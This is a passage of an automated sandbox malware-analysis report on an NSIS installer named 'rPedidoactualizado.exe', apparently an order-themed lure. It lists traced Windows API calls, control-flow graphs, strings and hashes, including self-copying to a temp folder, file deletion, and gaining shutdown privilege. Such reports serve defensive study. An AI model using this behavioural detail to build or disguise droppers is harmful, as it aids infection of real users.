                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                          • ExitProcess.KERNEL32 ref: 00403701
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                          • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\rPedidoactualizado.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                          • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                          • ExitProcess.KERNEL32 ref: 004038A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\rPedidoactualizado.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                          • API String ID: 3441113951-38364889
                                          • Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                          • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                          • Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                          • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 40543e-405459 140 4055e8-4055ef 139->140 141 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 4055f1-405613 GetDlgItem CreateThread CloseHandle 140->143 144 405619-405626 140->144 163 405544-405547 141->163 164 405528-405542 SendMessageW * 2 141->164 143->144 146 405644-40564e 144->146 147 405628-40562e 144->147 148 405650-405656 146->148 149 4056a4-4056a8 146->149 151 405630-40563f ShowWindow * 2 call 404243 147->151 152 405669-405672 call 404275 147->152 154 405658-405664 call 4041e7 148->154 155 40567e-40568e ShowWindow 148->155 149->152 158 4056aa-4056b0 149->158 151->146 160 405677-40567b 152->160 154->152 161 405690-405699 call 4052ff 155->161 162 40569e-40569f call 4041e7 155->162 158->152 165 4056b2-4056c5 SendMessageW 158->165 161->162 162->149 166 405557-40556e call 40420e 163->166 167 405549-405555 SendMessageW 163->167 164->163 168 4057c7-4057c9 165->168 169 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 165->169 178 405570-405584 ShowWindow 166->178 179 4055a4-4055c5 GetDlgItem SendMessageW 166->179 167->166 168->160 176 4056f8-405708 GetWindowRect 169->176 177 40570b-405720 TrackPopupMenu 169->177 176->177 177->168 180 405726-40573d 177->180 181 405593 178->181 182 405586-405591 ShowWindow 178->182 179->168 183 4055cb-4055e3 SendMessageW * 2 179->183 184 405742-40575d SendMessageW 180->184 185 405599-40559f call 404243 181->185 182->185 183->168 184->184 186 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405784-4057ab SendMessageW 186->188 188->188 189 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                          • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                          • GetClientRect.USER32(?,?), ref: 004054E8
                                          • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                          • ShowWindow.USER32(?,00000008), ref: 0040558B
                                          • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                          • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                            • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                          • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                          • CloseHandle.KERNELBASE(00000000), ref: 00405613
                                          • ShowWindow.USER32(00000000), ref: 00405637
                                          • ShowWindow.USER32(?,00000008), ref: 0040563C
                                          • ShowWindow.USER32(00000008), ref: 00405686
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                          • CreatePopupMenu.USER32 ref: 004056CB
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                          • GetWindowRect.USER32(?,?), ref: 004056FF
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                          • OpenClipboard.USER32(00000000), ref: 00405760
                                          • EmptyClipboard.USER32 ref: 00405766
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                          • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                          • CloseClipboard.USER32 ref: 004057C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                          • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                          • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                          • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 499 4059a9-4059cf call 405c74 502 4059d1-4059e3 DeleteFileW 499->502 503 4059e8-4059ef 499->503 504 405b65-405b69 502->504 505 4059f1-4059f3 503->505 506 405a02-405a12 call 406297 503->506 507 405b13-405b18 505->507 508 4059f9-4059fc 505->508 512 405a21-405a22 call 405bb8 506->512 513 405a14-405a1f lstrcatW 506->513 507->504 511 405b1a-405b1d 507->511 508->506 508->507 514 405b27-405b2f call 4065da 511->514 515 405b1f-405b25 511->515 517 405a27-405a2b 512->517 513->517 514->504 523 405b31-405b45 call 405b6c call 405961 514->523 515->504 520 405a37-405a3d lstrcatW 517->520 521 405a2d-405a35 517->521 522 405a42-405a5e lstrlenW FindFirstFileW 520->522 521->520 521->522 524 405a64-405a6c 522->524 525 405b08-405b0c 522->525 539 405b47-405b4a 523->539 540 405b5d-405b60 call 4052ff 523->540 527 405a8c-405aa0 call 406297 524->527 528 405a6e-405a76 524->528 525->507 530 405b0e 525->530 541 405aa2-405aaa 527->541 542 405ab7-405ac2 call 405961 527->542 531 405a78-405a80 528->531 532 405aeb-405afb FindNextFileW 528->532 530->507 531->527 535 405a82-405a8a 531->535 532->524 538 405b01-405b02 FindClose 532->538 535->527 535->532 538->525 539->515 543 405b4c-405b5b call 4052ff call 40605d 539->543 540->504 541->532 544 405aac-405ab5 call 4059a9 541->544 552 405ae3-405ae6 call 4052ff 542->552 553 405ac4-405ac7 542->553 543->504 544->532 552->532 554 405ac9-405ad9 call 4052ff call 40605d 553->554 555 405adb-405ae1 553->555 554->532 555->532
                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059D2
                                          • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A1A
                                          • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3D
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A43
                                          • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A53
                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                          • FindClose.KERNEL32(00000000), ref: 00405B02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-4111169507
                                          • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                          • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                          • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                          • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 725 4065da-4065ee FindFirstFileW 726 4065f0-4065f9 FindClose 725->726 727 4065fb 725->727 728 4065fd-4065fe 726->728 727->728
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                          • FindClose.KERNELBASE(00000000), ref: 004065F1
                                          Strings
                                          • pOz, xrefs: 004065DB
                                          • C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 004065DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp$pOz
                                          • API String ID: 2295610775-1859215772
                                          • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                          • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                          • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                          • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                          APIs
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                          • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                          • Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                          • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 190 403d35-403d47 191 403e88-403e97 190->191 192 403d4d-403d53 190->192 194 403ee6-403efb 191->194 195 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 191->195 192->191 193 403d59-403d62 192->193 196 403d64-403d71 SetWindowPos 193->196 197 403d77-403d7a 193->197 199 403f3b-403f40 call 40425a 194->199 200 403efd-403f00 194->200 195->194 196->197 202 403d94-403d9a 197->202 203 403d7c-403d8e ShowWindow 197->203 209 403f45-403f60 199->209 205 403f02-403f0d call 401389 200->205 206 403f33-403f35 200->206 210 403db6-403db9 202->210 211 403d9c-403db1 DestroyWindow 202->211 203->202 205->206 221 403f0f-403f2e SendMessageW 205->221 206->199 208 4041db 206->208 216 4041dd-4041e4 208->216 214 403f62-403f64 call 40140b 209->214 215 403f69-403f6f 209->215 219 403dbb-403dc7 SetWindowLongW 210->219 220 403dcc-403dd2 210->220 217 4041b8-4041be 211->217 214->215 224 403f75-403f80 215->224 225 404199-4041b2 DestroyWindow EndDialog 215->225 217->208 223 4041c0-4041c6 217->223 219->216 226 403e75-403e83 call 404275 220->226 227 403dd8-403de9 GetDlgItem 220->227 221->216 223->208 231 4041c8-4041d1 ShowWindow 223->231 224->225 232 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 224->232 225->217 226->216 228 403e08-403e0b 227->228 229 403deb-403e02 SendMessageW IsWindowEnabled 227->229 233 403e10-403e13 228->233 234 403e0d-403e0e 228->234 229->208 229->228 231->208 260 403fd5-403fda 232->260 261 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 232->261 238 403e21-403e26 233->238 239 403e15-403e1b 233->239 237 403e3e-403e43 call 4041e7 234->237 237->226 241 403e5c-403e6f SendMessageW 238->241 243 403e28-403e2e 238->243 239->241 242 403e1d-403e1f 239->242 241->226 242->237 246 403e30-403e36 call 40140b 243->246 247 403e45-403e4e call 40140b 243->247 258 403e3c 246->258 247->226 256 403e50-403e5a 247->256 256->258 258->237 260->261 264 40401b-40401c 261->264 265 40401e 261->265 266 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050-404061 SendMessageW 266->267 268 404063 266->268 269 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 267->269 268->269 269->209 280 4040ae-4040b0 269->280 280->209 281 4040b6-4040ba 280->281 282 4040d9-4040ed DestroyWindow 281->282 283 4040bc-4040c2 281->283 282->217 285 4040f3-404120 CreateDialogParamW 282->285 283->208 284 4040c8-4040ce 283->284 284->209 286 4040d4 284->286 285->217 287 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->208 287->208 292 40417f-404192 ShowWindow call 40425a 287->292 294 404197 292->294 294->217
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                          • ShowWindow.USER32(?), ref: 00403D8E
                                          • DestroyWindow.USER32 ref: 00403DA2
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                          • GetDlgItem.USER32(?,?), ref: 00403DDF
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                          • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                          • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                          • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                          • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                          • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                          • EnableWindow.USER32(?,?), ref: 00404011
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                          • EnableMenuItem.USER32(00000000), ref: 0040402E
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                          • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                          • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                          • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
